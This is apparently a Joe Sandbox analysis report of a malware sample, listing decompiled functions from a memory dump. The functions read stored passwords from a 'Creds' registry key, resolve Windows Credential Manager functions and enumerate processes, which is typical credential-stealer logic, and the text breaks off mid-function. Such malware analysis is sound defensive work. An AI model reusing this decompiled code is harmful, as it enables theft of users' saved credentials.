                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _stricmp_strnicmpmemsetsprintf
                                                                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                    • API String ID: 2822975062-2229823034
                                                                                                                                                    • Opcode ID: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                                                                                    • Instruction ID: 56d5f4bbafa72d85e66e322173295d9522024af121689b7315c9fa9ceefdefbd
                                                                                                                                                    • Opcode Fuzzy Hash: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                                                                                    • Instruction Fuzzy Hash: 754150B1604605EFD724DB69C8C1F96B7E8AF04304F14466BEA4AE7281D738FA45CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D6FB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 56%
                                                                                                                                                    			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
				int _v8;
				int _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char* _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				int _v44;
				void _v299;
				char _v300;
				char _v556;
				char _v812;
				char _v4908;
				void* __ebx;
				void* __edi;
				long _t46;
				int* _t84;
				char* _t85;

				E004118A0(0x132c, __ecx);
				_t84 = 0;
				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);
				if(_t46 != 0) {
					return _t46;
				}
				_v300 = _t46;
				memset( &_v299, 0, 0xff);
				_push(0xff);
				_push( &_v300);
				_v8 = 0;
				_push(0);
				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
						_v12 = 0x1000;
						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
							_v32 = _v12;
							_v28 =  &_v4908;
							_v40 = _a12;
							_v36 = _a8;
							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
								_t85 =  &_v812;
								_v812 = 0;
								_v556 = 0;
								E004060D0(0xff, _t85,  &_v300);
								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
								 *((intOrPtr*)( *_a4))(_t85);
								LocalFree(_v20);
								_t84 = 0;
							}
						}
						RegCloseKey(_v16);
					}
					_v8 = _v8 + 1;
					_push(0xff);
					_push( &_v300);
					_push(_v8);
				}
				return RegCloseKey(_a16);
			}























                                                                                                                                                    0x0040d703
                                                                                                                                                    0x0040d71a
                                                                                                                                                    0x0040d725
                                                                                                                                                    0x0040d729
                                                                                                                                                    0x0040d862
                                                                                                                                                    0x0040d862
                                                                                                                                                    0x0040d735
                                                                                                                                                    0x0040d743
                                                                                                                                                    0x0040d74b
                                                                                                                                                    0x0040d752
                                                                                                                                                    0x0040d753
                                                                                                                                                    0x0040d756
                                                                                                                                                    0x0040d844
                                                                                                                                                    0x0040d774
                                                                                                                                                    0x0040d792
                                                                                                                                                    0x0040d7a1
                                                                                                                                                    0x0040d7aa
                                                                                                                                                    0x0040d7b3
                                                                                                                                                    0x0040d7b9
                                                                                                                                                    0x0040d7bf
                                                                                                                                                    0x0040d7db
                                                                                                                                                    0x0040d7e4
                                                                                                                                                    0x0040d7ea
                                                                                                                                                    0x0040d7f1
                                                                                                                                                    0x0040d7f8
                                                                                                                                                    0x0040d812
                                                                                                                                                    0x0040d820
                                                                                                                                                    0x0040d825
                                                                                                                                                    0x0040d82b
                                                                                                                                                    0x0040d82b
                                                                                                                                                    0x0040d7db
                                                                                                                                                    0x0040d830
                                                                                                                                                    0x0040d830
                                                                                                                                                    0x0040d836
                                                                                                                                                    0x0040d839
                                                                                                                                                    0x0040d840
                                                                                                                                                    0x0040d841
                                                                                                                                                    0x0040d841
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                                                                                    • memset.MSVCRT ref: 0040D743
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040D825
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                                                                    • API String ID: 551151806-1288872324
                                                                                                                                                    • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                                                                                    • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                                                                                                                    • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                                                                                    • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004080A3 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 56%
                                                                                                                                                    			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				char _t30;
				struct HMENU__* _t32;
				char _t39;
				void* _t42;
				struct HWND__* _t43;
				struct HMENU__* _t48;

				_t42 = __edi;
				_t38 = __ecx;
				E004118A0(0x1004, __ecx);
				_t55 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t39 =  *0x417488;
						__eflags = _t39;
						if(_t39 == 0) {
							L8:
							_push(_t42);
							sprintf(0x4172c0, "dialog_%d", _a12);
							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t43,  &_v4104, 0x1000);
							__eflags = _v4104;
							if(__eflags != 0) {
								E00407E55(__eflags, "caption",  &_v4104);
							}
							EnumChildWindows(_t43, E00407FEB, 0);
							DestroyWindow(_t43);
						} else {
							while(1) {
								_t30 =  *_t39;
								__eflags = _t30;
								if(_t30 == 0) {
									goto L8;
								}
								__eflags = _t30 - _a12;
								if(_t30 != _a12) {
									_t39 = _t39 + 4;
									__eflags = _t39;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					sprintf(0x4172c0, "menu_%d", _a12);
					_t32 = LoadMenuA(_a4, _a12);
					 *0x4171b4 =  *0x4171b4 & 0x00000000;
					_t48 = _t32;
					_push(1);
					_push(_t48);
					_push(_a12);
					E00407EFB(_t38, _t55);
					DestroyMenu(_t48);
				}
				return 1;
			}











                                                                                                                                                    0x004080a3
                                                                                                                                                    0x004080a3
                                                                                                                                                    0x004080ab
                                                                                                                                                    0x004080b0
                                                                                                                                                    0x004080b5
                                                                                                                                                    0x004080fb
                                                                                                                                                    0x004080ff
                                                                                                                                                    0x00408105
                                                                                                                                                    0x0040810e
                                                                                                                                                    0x00408110
                                                                                                                                                    0x00408126
                                                                                                                                                    0x00408126
                                                                                                                                                    0x00408134
                                                                                                                                                    0x00408155
                                                                                                                                                    0x0040815f
                                                                                                                                                    0x00408165
                                                                                                                                                    0x00408176
                                                                                                                                                    0x0040817c
                                                                                                                                                    0x00408182
                                                                                                                                                    0x00408190
                                                                                                                                                    0x00408196
                                                                                                                                                    0x0040819e
                                                                                                                                                    0x004081a5
                                                                                                                                                    0x00408112
                                                                                                                                                    0x00408120
                                                                                                                                                    0x00408120
                                                                                                                                                    0x00408122
                                                                                                                                                    0x00408124
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00408114
                                                                                                                                                    0x00408117
                                                                                                                                                    0x0040811d
                                                                                                                                                    0x0040811d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040811d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00408117
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00408120
                                                                                                                                                    0x004081ac
                                                                                                                                                    0x004081ac
                                                                                                                                                    0x004080b7
                                                                                                                                                    0x004080c4
                                                                                                                                                    0x004080d2
                                                                                                                                                    0x004080d8
                                                                                                                                                    0x004080df
                                                                                                                                                    0x004080e1
                                                                                                                                                    0x004080e3
                                                                                                                                                    0x004080e4
                                                                                                                                                    0x004080e7
                                                                                                                                                    0x004080f0
                                                                                                                                                    0x004080f0
                                                                                                                                                    0x004081b2

                                                                                                                                                    APIs
                                                                                                                                                    • sprintf.MSVCRT ref: 004080C4
                                                                                                                                                    • LoadMenuA.USER32 ref: 004080D2
                                                                                                                                                      • Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
                                                                                                                                                      • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                                                                                                                      • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                                                                                                                      • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 004080F0
                                                                                                                                                    • sprintf.MSVCRT ref: 00408134
                                                                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                                                                                                                    • memset.MSVCRT ref: 00408165
                                                                                                                                                    • GetWindowTextA.USER32 ref: 00408176
                                                                                                                                                    • EnumChildWindows.USER32 ref: 0040819E
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 004081A5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                                                                    • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                                                                                    • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                                                                                                                    • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                                                                                                    • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E056 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040E056() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x417514 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleA("kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x416fe0 = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x416fd8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x416fd4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x416e6c = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x416fcc = _t2;
								if(_t2 != 0) {
									 *0x417514 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                                                    0x0040e05d
                                                                                                                                                    0x0040e0d9
                                                                                                                                                    0x0040e0d9
                                                                                                                                                    0x0040e065
                                                                                                                                                    0x0040e06b
                                                                                                                                                    0x0040e06f
                                                                                                                                                    0x0040e0d8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e0d8
                                                                                                                                                    0x0040e07e
                                                                                                                                                    0x0040e082
                                                                                                                                                    0x0040e087
                                                                                                                                                    0x0040e08f
                                                                                                                                                    0x0040e093
                                                                                                                                                    0x0040e098
                                                                                                                                                    0x0040e0a0
                                                                                                                                                    0x0040e0a4
                                                                                                                                                    0x0040e0a9
                                                                                                                                                    0x0040e0b1
                                                                                                                                                    0x0040e0b5
                                                                                                                                                    0x0040e0ba
                                                                                                                                                    0x0040e0c2
                                                                                                                                                    0x0040e0c6
                                                                                                                                                    0x0040e0cb
                                                                                                                                                    0x0040e0cd
                                                                                                                                                    0x0040e0cd
                                                                                                                                                    0x0040e0cb
                                                                                                                                                    0x0040e0ba
                                                                                                                                                    0x0040e0a9
                                                                                                                                                    0x0040e098
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                    • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                                                                                    • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                                                                                                                    • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                                                                                                    • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00404647 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__** _t23;

				_t23 = __eax;
				E004046C2(__eax);
				_t12 = LoadLibraryA("advapi32.dll");
				 *_t23 = _t12;
				if(_t12 != 0) {
					_t23[2] = GetProcAddress(_t12, "CredReadA");
					_t23[3] = GetProcAddress( *_t23, "CredFree");
					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
					if(_t23[2] == 0 || _t23[3] == 0) {
						E004046C2(_t23);
					} else {
						_t23[1] = 1;
					}
				}
				return _t23[1];
			}






                                                                                                                                                    0x00404648
                                                                                                                                                    0x0040464a
                                                                                                                                                    0x00404654
                                                                                                                                                    0x0040465c
                                                                                                                                                    0x0040465e
                                                                                                                                                    0x00404676
                                                                                                                                                    0x00404682
                                                                                                                                                    0x0040468e
                                                                                                                                                    0x0040469a
                                                                                                                                                    0x004046a3
                                                                                                                                                    0x004046a7
                                                                                                                                                    0x004046b8
                                                                                                                                                    0x004046af
                                                                                                                                                    0x004046af
                                                                                                                                                    0x004046af
                                                                                                                                                    0x004046a7
                                                                                                                                                    0x004046c1

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,7554F420), ref: 004046C9
                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                                                                    • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                                                                                    • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                                                                                                                    • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                                                                                                    • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411015 Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
				void _v8;
				void _v12;
				void _v24;
				char _v39;
				void _v40;
				char _v132;
				void _v1156;
				void _v1172;
				char _v1180;
				void _v1187;
				char _v1188;
				void _v2228;
				void _v2243;
				void _v2244;
				void _v3267;
				char _v3268;
				void _v4291;
				char _v4292;
				char _v5340;
				void _v5347;
				char _v5348;
				char _v6116;
				char _v7136;
				void _v7140;
				void* __edi;
				void* __esi;
				int _t86;
				void* _t109;
				void* _t122;
				void* _t135;
				char _t156;
				signed char _t168;
				signed int _t171;
				intOrPtr _t177;
				signed int _t183;
				void* _t185;

				_t171 = __edx;
				E004118A0(0x1be4, __ecx);
				_t156 = 0;
				_v3268 = 0;
				memset( &_v3267, 0, 0x3ff);
				_a8 = E00410E8A(_a8,  &_v3268);
				_t86 = strlen(_a4);
				_v8 = _t86;
				if(_a8 > 4) {
					_t193 = _t86;
					if(_t86 > 0) {
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_v2244 = 0;
						memset( &_v2243, 0, 0x41e);
						_v1188 = 0;
						memset( &_v1187, 0, 0x41e);
						_v5348 = 0;
						memset( &_v5347, 0, 0x41e);
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_v4292 = 0;
						memset( &_v4291, 0, 0x3ff);
						E0040BC49( &_v132);
						E0040BC6D(_v8,  &_v132, _a4);
						_t181 =  &_v132;
						E0040BD0B( &_v39,  &_v132,  &_v2244);
						memcpy( &_v2228,  &_v24, 8);
						E0040BC49( &_v132);
						_push( &_v2244);
						_t109 = 0x18;
						E0040BC6D(_t109,  &_v132);
						E0040BD0B( &_v39, _t181,  &_v1188);
						memcpy( &_v1172,  &_v2244, 0x10);
						memcpy( &_v1156,  &_v24, 8);
						E0040BC49(_t181);
						_push( &_v1188);
						_t122 = 0x28;
						E0040BC6D(_t122, _t181);
						E0040BD0B( &_v39, _t181,  &_v5348);
						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
						_t177 = _a8;
						asm("cdq");
						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
						_a4 = 0;
						if(_t183 > 0) {
							do {
								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
								_a4 =  &(_a4[1]);
							} while (_a4 < _t183);
							_t177 = _a8;
						}
						_t135 = 0;
						if(_t177 > _t156) {
							do {
								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
								_t135 = _t135 + 1;
								 *(_t185 + _t135 - 0x1be1) = _t168;
							} while (_t135 < _t177);
						}
						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
						strcpy(_a12,  &_v7136);
						E0040BC49( &_v132);
						_t67 = _t177 - 4; // 0x0
						E0040BC6D(_t67,  &_v132, _a12);
						E0040BD0B(_t177,  &_v132,  &_v40);
						memcpy( &_v8,  &_v40, 4);
						memcpy( &_v12,  &_v7140, 4);
						_t156 = 1;
						 *_a16 = 0 | _v8 == _v12;
					}
				}
				return _t156;
			}







































                                                                                                                                                    0x00411015
                                                                                                                                                    0x0041101d
                                                                                                                                                    0x00411025
                                                                                                                                                    0x00411034
                                                                                                                                                    0x0041103a
                                                                                                                                                    0x00411053
                                                                                                                                                    0x00411056
                                                                                                                                                    0x00411060
                                                                                                                                                    0x00411063
                                                                                                                                                    0x00411069
                                                                                                                                                    0x0041106b
                                                                                                                                                    0x00411079
                                                                                                                                                    0x0041107a
                                                                                                                                                    0x0041107b
                                                                                                                                                    0x0041108a
                                                                                                                                                    0x00411090
                                                                                                                                                    0x0041109e
                                                                                                                                                    0x004110a4
                                                                                                                                                    0x004110b2
                                                                                                                                                    0x004110b8
                                                                                                                                                    0x004110bf
                                                                                                                                                    0x004110c5
                                                                                                                                                    0x004110c6
                                                                                                                                                    0x004110c7
                                                                                                                                                    0x004110c8
                                                                                                                                                    0x004110cf
                                                                                                                                                    0x004110d8
                                                                                                                                                    0x004110de
                                                                                                                                                    0x004110e6
                                                                                                                                                    0x004110f4
                                                                                                                                                    0x00411100
                                                                                                                                                    0x00411103
                                                                                                                                                    0x00411115
                                                                                                                                                    0x0041111f
                                                                                                                                                    0x0041112a
                                                                                                                                                    0x0041112d
                                                                                                                                                    0x00411130
                                                                                                                                                    0x0041113c
                                                                                                                                                    0x00411151
                                                                                                                                                    0x00411163
                                                                                                                                                    0x0041116a
                                                                                                                                                    0x00411175
                                                                                                                                                    0x00411178
                                                                                                                                                    0x0041117b
                                                                                                                                                    0x00411187
                                                                                                                                                    0x004111a6
                                                                                                                                                    0x004111be
                                                                                                                                                    0x004111c3
                                                                                                                                                    0x004111c8
                                                                                                                                                    0x004111d0
                                                                                                                                                    0x004111d8
                                                                                                                                                    0x004111db
                                                                                                                                                    0x004111dd
                                                                                                                                                    0x004111f8
                                                                                                                                                    0x004111fd
                                                                                                                                                    0x00411203
                                                                                                                                                    0x00411206
                                                                                                                                                    0x00411206
                                                                                                                                                    0x00411209
                                                                                                                                                    0x0041120d
                                                                                                                                                    0x0041120f
                                                                                                                                                    0x00411216
                                                                                                                                                    0x0041121d
                                                                                                                                                    0x00411220
                                                                                                                                                    0x00411220
                                                                                                                                                    0x0041120f
                                                                                                                                                    0x00411233
                                                                                                                                                    0x0041123a
                                                                                                                                                    0x00411242
                                                                                                                                                    0x0041124a
                                                                                                                                                    0x00411250
                                                                                                                                                    0x0041125c
                                                                                                                                                    0x0041126b
                                                                                                                                                    0x0041127d
                                                                                                                                                    0x00411295
                                                                                                                                                    0x00411296
                                                                                                                                                    0x00411296
                                                                                                                                                    0x0041106b
                                                                                                                                                    0x0041129e

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0041103A
                                                                                                                                                      • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                                                                                    • strlen.MSVCRT ref: 00411056
                                                                                                                                                    • memset.MSVCRT ref: 00411090
                                                                                                                                                    • memset.MSVCRT ref: 004110A4
                                                                                                                                                    • memset.MSVCRT ref: 004110B8
                                                                                                                                                    • memset.MSVCRT ref: 004110DE
                                                                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                                                                                      • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                                                                                    • memcpy.MSVCRT ref: 00411115
                                                                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                                                                                      • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                                                                                      • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                                                                                    • memcpy.MSVCRT ref: 00411151
                                                                                                                                                    • memcpy.MSVCRT ref: 00411163
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 0041123A
                                                                                                                                                    • memcpy.MSVCRT ref: 0041126B
                                                                                                                                                    • memcpy.MSVCRT ref: 0041127D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpymemset$strlen$strcpy
                                                                                                                                                    • String ID: salu
                                                                                                                                                    • API String ID: 2660478486-4177317985
                                                                                                                                                    • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                                                                                    • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                                                                                                                    • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                                                                                                    • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00403E87 Relevance: 19.6, APIs: 7, Strings: 6, Instructions: 98stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                    			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
